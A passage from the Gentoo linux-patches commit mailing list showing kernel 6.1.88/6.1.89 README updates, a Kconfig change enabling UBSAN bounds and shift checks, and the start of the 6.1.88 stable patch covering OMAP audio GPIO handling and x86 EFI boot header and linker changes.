+-		goto fail3;
+-	}
+-
+ 	omap3pandora_dac_reg = regulator_get(&omap3pandora_snd_device->dev, "vcc");
+ 	if (IS_ERR(omap3pandora_dac_reg)) {
+ 		pr_err(PREFIX "Failed to get DAC regulator from %s: %ld\n",
+@@ -271,7 +283,10 @@ static int __init omap3pandora_soc_init(void)
+ 	platform_device_del(omap3pandora_snd_device);
+ fail2:
+ 	platform_device_put(omap3pandora_snd_device);
+-
++fail1:
++	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
++fail0:
++	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
+ 	return ret;
+ }
+ module_init(omap3pandora_soc_init);
+@@ -280,6 +295,8 @@ static void __exit omap3pandora_soc_exit(void)
+ {
+ 	regulator_put(omap3pandora_dac_reg);
+ 	platform_device_unregister(omap3pandora_snd_device);
++	gpio_free(OMAP3_PANDORA_AMP_POWER_GPIO);
++	gpio_free(OMAP3_PANDORA_DAC_POWER_GPIO);
+ }
+ module_exit(omap3pandora_soc_exit);
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-29 11:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-29 11:27 UTC (permalink / raw
  To: gentoo-commits

commit:     953980257fd3f8126add5807fc245277a419b080
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Apr 29 11:27:00 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Apr 29 11:27:00 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=95398025

Linux patch 6.1.89

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/0000_README b/0000_README
index 54940ade..d6fe6f2d 100644
--- a/0000_README
+++ b/0000_README
@@ -395,6 +395,10 @@ Patch:  1087_linux-6.1.88.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.88
 
+Patch:  1088_linux-6.1.89.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.89
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-27 22:45 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-27 22:45 UTC (permalink / raw
  To: gentoo-commits

commit:     47c1a6be7342f74fc0212885099153b2b2f014b8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Apr 27 22:44:45 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Apr 27 22:44:45 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=47c1a6be

Add UBSAN_BOUNDS and UBSAN_SHIFT and dependencies

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 195c7d47..4dcd85ca 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -6,9 +6,9 @@
  source "Documentation/Kconfig"
 +
 +source "distro/Kconfig"
---- /dev/null	2022-08-25 07:13:06.694086407 -0400
-+++ b/distro/Kconfig	2022-08-25 13:21:55.150660724 -0400
-@@ -0,0 +1,291 @@
+--- /dev/null	2024-04-27 13:10:54.188000027 -0400
++++ b/distro/Kconfig	2024-04-27 18:16:00.549054795 -0400
+@@ -0,0 +1,295 @@
 +menu "Gentoo Linux"
 +
 +config GENTOO_LINUX
@@ -213,6 +213,10 @@
 +	select SLAB_FREELIST_HARDENED
 +	select SHUFFLE_PAGE_ALLOCATOR
 +	select SLUB_DEBUG
++	select UBSAN
++	select CC_HAS_UBSAN_BOUNDS_STRICT if !CC_HAS_UBSAN_ARRAY_BOUNDS
++	select UBSAN_BOUNDS
++	select UBSAN_SHIFT
 +	select PAGE_POISONING
 +	select PAGE_POISONING_NO_SANITY
 +	select PAGE_POISONING_ZERO
@@ -300,7 +304,6 @@
 +		See the settings that become available for more details and fine-tuning.
 +
 +endmenu
-diff --git a/security/selinux/Kconfig b/security/selinux/Kconfig
 index 9e921fc72..f29bc13fa 100644
 --- a/security/selinux/Kconfig
 +++ b/security/selinux/Kconfig
@@ -339,4 +342,3 @@ index 24c045b24..e13fc740c 100644
  	  This is the portion of low virtual memory which should be protected
 -- 
 2.31.1
-```


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-27 17:06 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-27 17:06 UTC (permalink / raw
  To: gentoo-commits

commit:     04c7abfee3e9cb01a7248fcd438c73efb579e8d8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Apr 27 17:06:11 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Apr 27 17:06:11 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=04c7abfe

Linux patch 6.1.88

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1087_linux-6.1.88.patch | 16400 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 16404 insertions(+)

diff --git a/0000_README b/0000_README
index b5d4486e..54940ade 100644
--- a/0000_README
+++ b/0000_README
@@ -391,6 +391,10 @@ Patch:  1086_linux-6.1.87.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.87
 
+Patch:  1087_linux-6.1.88.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.88
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1087_linux-6.1.88.patch b/1087_linux-6.1.88.patch
new file mode 100644
index 00000000..a680e8c6
--- /dev/null
+++ b/1087_linux-6.1.88.patch
@@ -0,0 +1,16400 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index aebbe2981241a..e6f0570cf4900 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -6603,6 +6603,9 @@
+ 					pause after every control message);
+ 				o = USB_QUIRK_HUB_SLOW_RESET (Hub needs extra
+ 					delay after resetting its port);
++				p = USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT
++					(Reduce timeout of the SET_ADDRESS
++					request from 5000 ms to 500 ms);
+ 			Example: quirks=0781:5580:bk,0a5c:5834:gij
+ 
+ 	usbhid.mousepoll=
+diff --git a/MAINTAINERS b/MAINTAINERS
+index bbfedb0b20938..ecf4d0c8f446e 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -8031,7 +8031,7 @@ M:	Geoffrey D. Bennett <g@b4.vu>
+ L:	alsa-devel@alsa-project.org (moderated for non-subscribers)
+ S:	Maintained
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound.git
+-F:	sound/usb/mixer_scarlett_gen2.c
++F:	sound/usb/mixer_scarlett2.c
+ 
+ FORCEDETH GIGABIT ETHERNET DRIVER
+ M:	Rain River <rain.1986.08.12@gmail.com>
+diff --git a/Makefile b/Makefile
+index e46a57006a34f..c73cb678fb9ac 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 87
++SUBLEVEL = 88
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-omap2/board-n8x0.c b/arch/arm/mach-omap2/board-n8x0.c
+index 5e86145db0e2a..8897364e550ba 100644
+--- a/arch/arm/mach-omap2/board-n8x0.c
++++ b/arch/arm/mach-omap2/board-n8x0.c
+@@ -22,7 +22,6 @@
+ #include <linux/platform_data/spi-omap2-mcspi.h>
+ #include <linux/platform_data/mmc-omap.h>
+ #include <linux/mfd/menelaus.h>
+-#include <sound/tlv320aic3x.h>
+ 
+ #include <asm/mach/arch.h>
+ #include <asm/mach-types.h>
+@@ -567,10 +566,6 @@ struct menelaus_platform_data n8x0_menelaus_platform_data = {
+ 	.late_init = n8x0_menelaus_late_init,
+ };
+ 
+-struct aic3x_pdata n810_aic33_data = {
+-	.gpio_reset = 118,
+-};
+-
+ static int __init n8x0_late_initcall(void)
+ {
+ 	if (!board_caps)
+diff --git a/arch/arm/mach-omap2/common-board-devices.h b/arch/arm/mach-omap2/common-board-devices.h
+index b23962c38fb27..69694af714751 100644
+--- a/arch/arm/mach-omap2/common-board-devices.h
++++ b/arch/arm/mach-omap2/common-board-devices.h
+@@ -2,12 +2,10 @@
+ #ifndef __OMAP_COMMON_BOARD_DEVICES__
+ #define __OMAP_COMMON_BOARD_DEVICES__
+ 
+-#include <sound/tlv320aic3x.h>
+ #include <linux/mfd/menelaus.h>
+ 
+ void *n8x0_legacy_init(void);
+ 
+ extern struct menelaus_platform_data n8x0_menelaus_platform_data;
+-extern struct aic3x_pdata n810_aic33_data;
+ 
+ #endif /* __OMAP_COMMON_BOARD_DEVICES__ */
+diff --git a/arch/arm/mach-omap2/pdata-quirks.c b/arch/arm/mach-omap2/pdata-quirks.c
+index 5b99d602c87bc..44da1e14a3740 100644
+--- a/arch/arm/mach-omap2/pdata-quirks.c
++++ b/arch/arm/mach-omap2/pdata-quirks.c
+@@ -257,9 +257,19 @@ static struct platform_device pandora_backlight = {
+ 	.id	= -1,
+ };
+ 
++static struct gpiod_lookup_table pandora_soc_audio_gpios = {
++	.dev_id = "soc-audio",
++	.table = {
++		GPIO_LOOKUP("gpio-112-127", 6, "dac", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("gpio-0-15", 14, "amp", GPIO_ACTIVE_HIGH),
++		{ }
++	},
++};
++
+ static void __init omap3_pandora_legacy_init(void)
+ {
+ 	platform_device_register(&pandora_backlight);
++	gpiod_add_lookup_table(&pandora_soc_audio_gpios);
+ }
+ #endif /* CONFIG_ARCH_OMAP3 */
+ 
+@@ -440,7 +450,6 @@ static struct of_dev_auxdata omap_auxdata_lookup[] = {
+ #ifdef CONFIG_MACH_NOKIA_N8X0
+ 	OF_DEV_AUXDATA("ti,omap2420-mmc", 0x4809c000, "mmci-omap.0", NULL),
+ 	OF_DEV_AUXDATA("menelaus", 0x72, "1-0072", &n8x0_menelaus_platform_data),
+-	OF_DEV_AUXDATA("tlv320aic3x", 0x18, "2-0018", &n810_aic33_data),
+ #endif
+ #ifdef CONFIG_ARCH_OMAP3
+ 	OF_DEV_AUXDATA("ti,omap2-iommu", 0x5d000000, "5d000000.mmu",
+diff --git a/arch/arm64/mm/pageattr.c b/arch/arm64/mm/pageattr.c
+index 826cb200b204f..425b398f8d456 100644
+--- a/arch/arm64/mm/pageattr.c
++++ b/arch/arm64/mm/pageattr.c
+@@ -220,9 +220,6 @@ bool kernel_page_present(struct page *page)
+ 	pte_t *ptep;
+ 	unsigned long addr = (unsigned long)page_address(page);
+ 
+-	if (!can_set_direct_map())
+-		return true;
+-
+ 	pgdp = pgd_offset_k(addr);
+ 	if (pgd_none(READ_ONCE(*pgdp)))
+ 		return false;
+diff --git a/arch/x86/boot/Makefile b/arch/x86/boot/Makefile
+index 9e38ffaadb5d9..3c1b3520361c7 100644
+--- a/arch/x86/boot/Makefile
++++ b/arch/x86/boot/Makefile
+@@ -91,7 +91,7 @@ $(obj)/vmlinux.bin: $(obj)/compressed/vmlinux FORCE
+ 
+ SETUP_OBJS = $(addprefix $(obj)/,$(setup-y))
+ 
+-sed-zoffset := -e 's/^\([0-9a-fA-F]*\) [a-zA-Z] \(startup_32\|startup_64\|efi32_stub_entry\|efi64_stub_entry\|efi_pe_entry\|efi32_pe_entry\|input_data\|kernel_info\|_end\|_ehead\|_text\|z_.*\)$$/\#define ZO_\2 0x\1/p'
++sed-zoffset := -e 's/^\([0-9a-fA-F]*\) [a-zA-Z] \(startup_32\|efi.._stub_entry\|efi\(32\)\?_pe_entry\|input_data\|kernel_info\|_end\|_ehead\|_text\|_e\?data\|z_.*\)$$/\#define ZO_\2 0x\1/p'
+ 
+ quiet_cmd_zoffset = ZOFFSET $@
+       cmd_zoffset = $(NM) $< | sed -n $(sed-zoffset) > $@
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 3965b2c9efee0..6e61baff223f8 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -84,7 +84,7 @@ LDFLAGS_vmlinux += -T
+ hostprogs	:= mkpiggy
+ HOST_EXTRACFLAGS += -I$(srctree)/tools/include
+ 
+-sed-voffset := -e 's/^\([0-9a-fA-F]*\) [ABCDGRSTVW] \(_text\|__bss_start\|_end\)$$/\#define VO_\2 _AC(0x\1,UL)/p'
++sed-voffset := -e 's/^\([0-9a-fA-F]*\) [ABCDGRSTVW] \(_text\|__start_rodata\|__bss_start\|_end\)$$/\#define VO_\2 _AC(0x\1,UL)/p'
+ 
+ quiet_cmd_voffset = VOFFSET $@
+       cmd_voffset = $(NM) $< | sed -n $(sed-voffset) > $@
+diff --git a/arch/x86/boot/compressed/misc.c b/arch/x86/boot/compressed/misc.c
+index 8ae7893d712ff..45435ff883635 100644
+--- a/arch/x86/boot/compressed/misc.c
++++ b/arch/x86/boot/compressed/misc.c
+@@ -330,6 +330,7 @@ static size_t parse_elf(void *output)
+ 	return ehdr.e_entry - LOAD_PHYSICAL_ADDR;
+ }
+ 
++const unsigned long kernel_text_size = VO___start_rodata - VO__text;
+ const unsigned long kernel_total_size = VO__end - VO__text;
+ 
+ static u8 boot_heap[BOOT_HEAP_SIZE] __aligned(4);
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index d07e665bb265b..3c5d5c97f8f73 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -118,6 +118,9 @@ static bool fault_in_kernel_space(unsigned long address)
+ #define __init
+ #define __pa(x)	((unsigned long)(x))
+ 
++#undef __head
++#define __head
++
+ #define __BOOT_COMPRESSED
+ 
+ /* Basic instruction decoding support needed */
+diff --git a/arch/x86/boot/compressed/vmlinux.lds.S b/arch/x86/boot/compressed/vmlinux.lds.S
+index 112b2375d021b..bcf0e4e4c98e8 100644
+--- a/arch/x86/boot/compressed/vmlinux.lds.S
++++ b/arch/x86/boot/compressed/vmlinux.lds.S
+@@ -42,11 +42,13 @@ SECTIONS
+ 		*(.rodata.*)
+ 		_erodata = . ;
+ 	}
+-	.data :	{
++	.data :	ALIGN(0x1000) {
+ 		_data = . ;
+ 		*(.data)
+ 		*(.data.*)
+-		*(.bss.efistub)
++
++		/* Add 4 bytes of extra space for a CRC-32 checksum */
++		. = ALIGN(. + 4, 0x200);
+ 		_edata = . ;
+ 	}
+ 	. = ALIGN(L1_CACHE_BYTES);
+diff --git a/arch/x86/boot/header.S b/arch/x86/boot/header.S
+index d31982509654d..7593339b529a2 100644
+--- a/arch/x86/boot/header.S
++++ b/arch/x86/boot/header.S
+@@ -36,65 +36,19 @@ SYSSEG		= 0x1000		/* historical load address >> 4 */
+ #define ROOT_RDONLY 1
+ #endif
+ 
++	.set	salign, 0x1000
++	.set	falign, 0x200
++
+ 	.code16
+ 	.section ".bstext", "ax"
+-
+-	.global bootsect_start
+-bootsect_start:
+ #ifdef CONFIG_EFI_STUB
+ 	# "MZ", MS-DOS header
+ 	.word	MZ_MAGIC
+-#endif
+-
+-	# Normalize the start address
+-	ljmp	$BOOTSEG, $start2
+-
+-start2:
+-	movw	%cs, %ax
+-	movw	%ax, %ds
+-	movw	%ax, %es
+-	movw	%ax, %ss
+-	xorw	%sp, %sp
+-	sti
+-	cld
+-
+-	movw	$bugger_off_msg, %si
+-
+-msg_loop:
+-	lodsb
+-	andb	%al, %al
+-	jz	bs_die
+-	movb	$0xe, %ah
+-	movw	$7, %bx
+-	int	$0x10
+-	jmp	msg_loop
+-
+-bs_die:
+-	# Allow the user to press a key, then reboot
+-	xorw	%ax, %ax
+-	int	$0x16
+-	int	$0x19
+-
+-	# int 0x19 should never return.  In case it does anyway,
+-	# invoke the BIOS reset code...
+-	ljmp	$0xf000,$0xfff0
+-
+-#ifdef CONFIG_EFI_STUB
+ 	.org	0x3c
+ 	#
+ 	# Offset to the PE header.
+ 	#
+ 	.long	pe_header
+-#endif /* CONFIG_EFI_STUB */
+-
+-	.section ".bsdata", "a"
+-bugger_off_msg:
+-	.ascii	"Use a boot loader.\r\n"
+-	.ascii	"\n"
+-	.ascii	"Remove disk and press any key to reboot...\r\n"
+-	.byte	0
+-
+-#ifdef CONFIG_EFI_STUB
+ pe_header:
+ 	.long	PE_MAGIC
+ 
+@@ -123,30 +77,26 @@ optional_header:
+ 	.byte	0x02				# MajorLinkerVersion
+ 	.byte	0x14				# MinorLinkerVersion
+ 
+-	# Filled in by build.c
+-	.long	0				# SizeOfCode
++	.long	ZO__data			# SizeOfCode
+ 
+-	.long	0				# SizeOfInitializedData
++	.long	ZO__end - ZO__data		# SizeOfInitializedData
+ 	.long	0				# SizeOfUninitializedData
+ 
+-	# Filled in by build.c
+-	.long	0x0000				# AddressOfEntryPoint
++	.long	setup_size + ZO_efi_pe_entry	# AddressOfEntryPoint
+ 
+-	.long	0x0200				# BaseOfCode
++	.long	setup_size			# BaseOfCode
+ #ifdef CONFIG_X86_32
+ 	.long	0				# data
+ #endif
+ 
+ extra_header_fields:
+-	# PE specification requires ImageBase to be 64k aligned
+-	.set	image_base, (LOAD_PHYSICAL_ADDR + 0xffff) & ~0xffff
+ #ifdef CONFIG_X86_32
+-	.long	image_base			# ImageBase
++	.long	0				# ImageBase
+ #else
+-	.quad	image_base			# ImageBase
++	.quad	0				# ImageBase
+ #endif
+-	.long	0x20				# SectionAlignment
+-	.long	0x20				# FileAlignment
++	.long	salign				# SectionAlignment
++	.long	falign				# FileAlignment
+ 	.word	0				# MajorOperatingSystemVersion
+ 	.word	0				# MinorOperatingSystemVersion
+ 	.word	LINUX_EFISTUB_MAJOR_VERSION	# MajorImageVersion
+@@ -155,12 +105,9 @@ extra_header_fields:
+ 	.word	0				# MinorSubsystemVersion
+ 	.long	0				# Win32VersionValue
+ 
+-	#
+-	# The size of the bzImage is written in tools/build.c
+-	#
+-	.long	0				# SizeOfImage
++	.long	setup_size + ZO__end		# SizeOfImage
+ 
+-	.long	0x200				# SizeOfHeaders
++	.long	salign				# SizeOfHeaders
+ 	.long	0				# CheckSum
+ 	.word	IMAGE_SUBSYSTEM_EFI_APPLICATION	# Subsystem (EFI application)
+ #ifdef CONFIG_EFI_DXE_MEM_ATTRIBUTES
+@@ -191,87 +138,77 @@ extra_header_fields:
+ 
+ 	# Section table
+ section_table:
+-	#
+-	# The offset & size fields are filled in by build.c.
+-	#
+ 	.ascii	".setup"
+ 	.byte	0
+ 	.byte	0
+-	.long	0
+-	.long	0x0				# startup_{32,64}
+-	.long	0				# Size of initialized data
+-						# on disk
+-	.long	0x0				# startup_{32,64}
+-	.long	0				# PointerToRelocations
+-	.long	0				# PointerToLineNumbers
+-	.word	0				# NumberOfRelocations
+-	.word	0				# NumberOfLineNumbers
+-	.long	IMAGE_SCN_CNT_CODE		| \
+-		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_EXECUTE		| \
+-		IMAGE_SCN_ALIGN_16BYTES		# Characteristics
++	.long	pecompat_fstart - salign 	# VirtualSize
++	.long	salign				# VirtualAddress
++	.long	pecompat_fstart - salign	# SizeOfRawData
++	.long	salign				# PointerToRawData
+ 
+-	#
+-	# The EFI application loader requires a relocation section
+-	# because EFI applications must be relocatable. The .reloc
+-	# offset & size fields are filled in by build.c.
+-	#
+-	.ascii	".reloc"
+-	.byte	0
+-	.byte	0
+-	.long	0
+-	.long	0
+-	.long	0				# SizeOfRawData
+-	.long	0				# PointerToRawData
+-	.long	0				# PointerToRelocations
+-	.long	0				# PointerToLineNumbers
+-	.word	0				# NumberOfRelocations
+-	.word	0				# NumberOfLineNumbers
++	.long	0, 0, 0
+ 	.long	IMAGE_SCN_CNT_INITIALIZED_DATA	| \
+ 		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_DISCARDABLE	| \
+-		IMAGE_SCN_ALIGN_1BYTES		# Characteristics
++		IMAGE_SCN_MEM_DISCARDABLE	# Characteristics
+ 
+ #ifdef CONFIG_EFI_MIXED
+-	#
+-	# The offset & size fields are filled in by build.c.
+-	#
+ 	.asciz	".compat"
+-	.long	0
+-	.long	0x0
+-	.long	0				# Size of initialized data
+-						# on disk
+-	.long	0x0
+-	.long	0				# PointerToRelocations
+-	.long	0				# PointerToLineNumbers
+-	.word	0				# NumberOfRelocations
+-	.word	0				# NumberOfLineNumbers
++
++	.long	pecompat_fsize			# VirtualSize
++	.long	pecompat_fstart			# VirtualAddress
++	.long	pecompat_fsize			# SizeOfRawData
++	.long	pecompat_fstart			# PointerToRawData
++
++	.long	0, 0, 0
+ 	.long	IMAGE_SCN_CNT_INITIALIZED_DATA	| \
+ 		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_DISCARDABLE	| \
+-		IMAGE_SCN_ALIGN_1BYTES		# Characteristics
++		IMAGE_SCN_MEM_DISCARDABLE	# Characteristics
++
++	/*
++	 * Put the IA-32 machine type and the associated entry point address in
++	 * the .compat section, so loaders can figure out which other execution
++	 * modes this image supports.
++	 */
++	.pushsection ".pecompat", "a", @progbits
++	.balign	salign
++	.globl	pecompat_fstart
++pecompat_fstart:
++	.byte	0x1				# Version
++	.byte	8				# Size
++	.word	IMAGE_FILE_MACHINE_I386		# PE machine type
++	.long	setup_size + ZO_efi32_pe_entry	# Entrypoint
++	.byte	0x0				# Sentinel
++	.popsection
++#else
++	.set	pecompat_fstart, setup_size
+ #endif
+-
+-	#
+-	# The offset & size fields are filled in by build.c.
+-	#
+ 	.ascii	".text"
+ 	.byte	0
+ 	.byte	0
+ 	.byte	0
+-	.long	0
+-	.long	0x0				# startup_{32,64}
+-	.long	0				# Size of initialized data
++	.long	ZO__data
++	.long	setup_size
++	.long	ZO__data			# Size of initialized data
+ 						# on disk
+-	.long	0x0				# startup_{32,64}
++	.long	setup_size
+ 	.long	0				# PointerToRelocations
+ 	.long	0				# PointerToLineNumbers
+ 	.word	0				# NumberOfRelocations
+ 	.word	0				# NumberOfLineNumbers
+ 	.long	IMAGE_SCN_CNT_CODE		| \
+ 		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_EXECUTE		| \
+-		IMAGE_SCN_ALIGN_16BYTES		# Characteristics
++		IMAGE_SCN_MEM_EXECUTE		# Characteristics
++
++	.ascii	".data\0\0\0"
++	.long	ZO__end - ZO__data		# VirtualSize
++	.long	setup_size + ZO__data		# VirtualAddress
++	.long	ZO__edata - ZO__data		# SizeOfRawData
++	.long	setup_size + ZO__data		# PointerToRawData
++
++	.long	0, 0, 0
++	.long	IMAGE_SCN_CNT_INITIALIZED_DATA	| \
++		IMAGE_SCN_MEM_READ		| \
++		IMAGE_SCN_MEM_WRITE		# Characteristics
+ 
+ 	.set	section_count, (. - section_table) / 40
+ #endif /* CONFIG_EFI_STUB */
+@@ -285,12 +222,12 @@ sentinel:	.byte 0xff, 0xff        /* Used to detect broken loaders */
+ 
+ 	.globl	hdr
+ hdr:
+-setup_sects:	.byte 0			/* Filled in by build.c */
++		.byte setup_sects - 1
+ root_flags:	.word ROOT_RDONLY
+-syssize:	.long 0			/* Filled in by build.c */
++syssize:	.long ZO__edata / 16
+ ram_size:	.word 0			/* Obsolete */
+ vid_mode:	.word SVGA_MODE
+-root_dev:	.word 0			/* Filled in by build.c */
++root_dev:	.word 0			/* Default to major/minor 0/0 */
+ boot_flag:	.word 0xAA55
+ 
+ 	# offset 512, entry point
+@@ -578,9 +515,25 @@ pref_address:		.quad LOAD_PHYSICAL_ADDR	# preferred load addr
+ # define INIT_SIZE VO_INIT_SIZE
+ #endif
+ 
++	.macro		__handover_offset
++#ifndef CONFIG_EFI_HANDOVER_PROTOCOL
++	.long		0
++#elif !defined(CONFIG_X86_64)
++	.long		ZO_efi32_stub_entry
++#else
++	/* Yes, this is really how we defined it :( */
++	.long		ZO_efi64_stub_entry - 0x200
++#ifdef CONFIG_EFI_MIXED
++	.if		ZO_efi32_stub_entry != ZO_efi64_stub_entry - 0x200
++	.error		"32-bit and 64-bit EFI entry points do not match"
++	.endif
++#endif
++#endif
++	.endm
++
+ init_size:		.long INIT_SIZE		# kernel initialization size
+-handover_offset:	.long 0			# Filled in by build.c
+-kernel_info_offset:	.long 0			# Filled in by build.c
++handover_offset:	__handover_offset
++kernel_info_offset:	.long ZO_kernel_info
+ 
+ # End of setup header #####################################################
+ 
+diff --git a/arch/x86/boot/setup.ld b/arch/x86/boot/setup.ld
+index 49546c247ae25..3a2d1360abb01 100644
+--- a/arch/x86/boot/setup.ld
++++ b/arch/x86/boot/setup.ld
+@@ -10,10 +10,11 @@ ENTRY(_start)
+ SECTIONS
+ {
+ 	. = 0;
+-	.bstext		: { *(.bstext) }
+-	.bsdata		: { *(.bsdata) }
++	.bstext	: {
++		*(.bstext)
++		. = 495;
++	} =0xffffffff
+ 
+-	. = 495;
+ 	.header		: { *(.header) }
+ 	.entrytext	: { *(.entrytext) }
+ 	.inittext	: { *(.inittext) }
+@@ -23,6 +24,9 @@ SECTIONS
+ 	.text		: { *(.text .text.*) }
+ 	.text32		: { *(.text32) }
+ 
++	.pecompat	: { *(.pecompat) }
++	PROVIDE(pecompat_fsize = setup_size - pecompat_fstart);
++
+ 	. = ALIGN(16);
+ 	.rodata		: { *(.rodata*) }
+ 
+@@ -38,8 +42,10 @@ SECTIONS
+ 	.signature	: {
+ 		setup_sig = .;
+ 		LONG(0x5a5aaa55)
+-	}
+ 
++		setup_size = ALIGN(ABSOLUTE(.), 4096);
++		setup_sects = ABSOLUTE(setup_size / 512);
++	}
+ 
+ 	. = ALIGN(16);
+ 	.bss		:
+diff --git a/arch/x86/boot/tools/build.c b/arch/x86/boot/tools/build.c
+index bd247692b7017..10311d77c67f8 100644
+--- a/arch/x86/boot/tools/build.c
++++ b/arch/x86/boot/tools/build.c
+@@ -40,10 +40,6 @@ typedef unsigned char  u8;
+ typedef unsigned short u16;
+ typedef unsigned int   u32;
+ 
+-#define DEFAULT_MAJOR_ROOT 0
+-#define DEFAULT_MINOR_ROOT 0
+-#define DEFAULT_ROOT_DEV (DEFAULT_MAJOR_ROOT << 8 | DEFAULT_MINOR_ROOT)
+-
+ /* Minimal number of setup sectors */
+ #define SETUP_SECT_MIN 5
+ #define SETUP_SECT_MAX 64
+@@ -51,22 +47,7 @@ typedef unsigned int   u32;
+ /* This must be large enough to hold the entire setup */
+ u8 buf[SETUP_SECT_MAX*512];
+ 
+-#define PECOFF_RELOC_RESERVE 0x20
+-
+-#ifdef CONFIG_EFI_MIXED
+-#define PECOFF_COMPAT_RESERVE 0x20
+-#else
+-#define PECOFF_COMPAT_RESERVE 0x0
+-#endif
+-
+-static unsigned long efi32_stub_entry;
+-static unsigned long efi64_stub_entry;
+-static unsigned long efi_pe_entry;
+-static unsigned long efi32_pe_entry;
+-static unsigned long kernel_info;
+-static unsigned long startup_64;
+-static unsigned long _ehead;
+-static unsigned long _end;
++static unsigned long _edata;
+ 
+ /*----------------------------------------------------------------------*/
+ 
+@@ -152,180 +133,6 @@ static void usage(void)
+ 	die("Usage: build setup system zoffset.h image");
+ }
+ 
+-#ifdef CONFIG_EFI_STUB
+-
+-static void update_pecoff_section_header_fields(char *section_name, u32 vma, u32 size, u32 datasz, u32 offset)
+-{
+-	unsigned int pe_header;
+-	unsigned short num_sections;
+-	u8 *section;
+-
+-	pe_header = get_unaligned_le32(&buf[0x3c]);
+-	num_sections = get_unaligned_le16(&buf[pe_header + 6]);
+-
+-#ifdef CONFIG_X86_32
+-	section = &buf[pe_header + 0xa8];
+-#else
+-	section = &buf[pe_header + 0xb8];
+-#endif
+-
+-	while (num_sections > 0) {
+-		if (strncmp((char*)section, section_name, 8) == 0) {
+-			/* section header size field */
+-			put_unaligned_le32(size, section + 0x8);
+-
+-			/* section header vma field */
+-			put_unaligned_le32(vma, section + 0xc);
+-
+-			/* section header 'size of initialised data' field */
+-			put_unaligned_le32(datasz, section + 0x10);
+-
+-			/* section header 'file offset' field */
+-			put_unaligned_le32(offset, section + 0x14);
+-
+-			break;
+-		}
+-		section += 0x28;
+-		num_sections--;
+-	}
+-}
+-
+-static void update_pecoff_section_header(char *section_name, u32 offset, u32 size)
+-{
+-	update_pecoff_section_header_fields(section_name, offset, size, size, offset);
+-}
+-
+-static void update_pecoff_setup_and_reloc(unsigned int size)
+-{
+-	u32 setup_offset = 0x200;
+-	u32 reloc_offset = size - PECOFF_RELOC_RESERVE - PECOFF_COMPAT_RESERVE;
+-#ifdef CONFIG_EFI_MIXED
+-	u32 compat_offset = reloc_offset + PECOFF_RELOC_RESERVE;
+-#endif
+-	u32 setup_size = reloc_offset - setup_offset;
+-
+-	update_pecoff_section_header(".setup", setup_offset, setup_size);
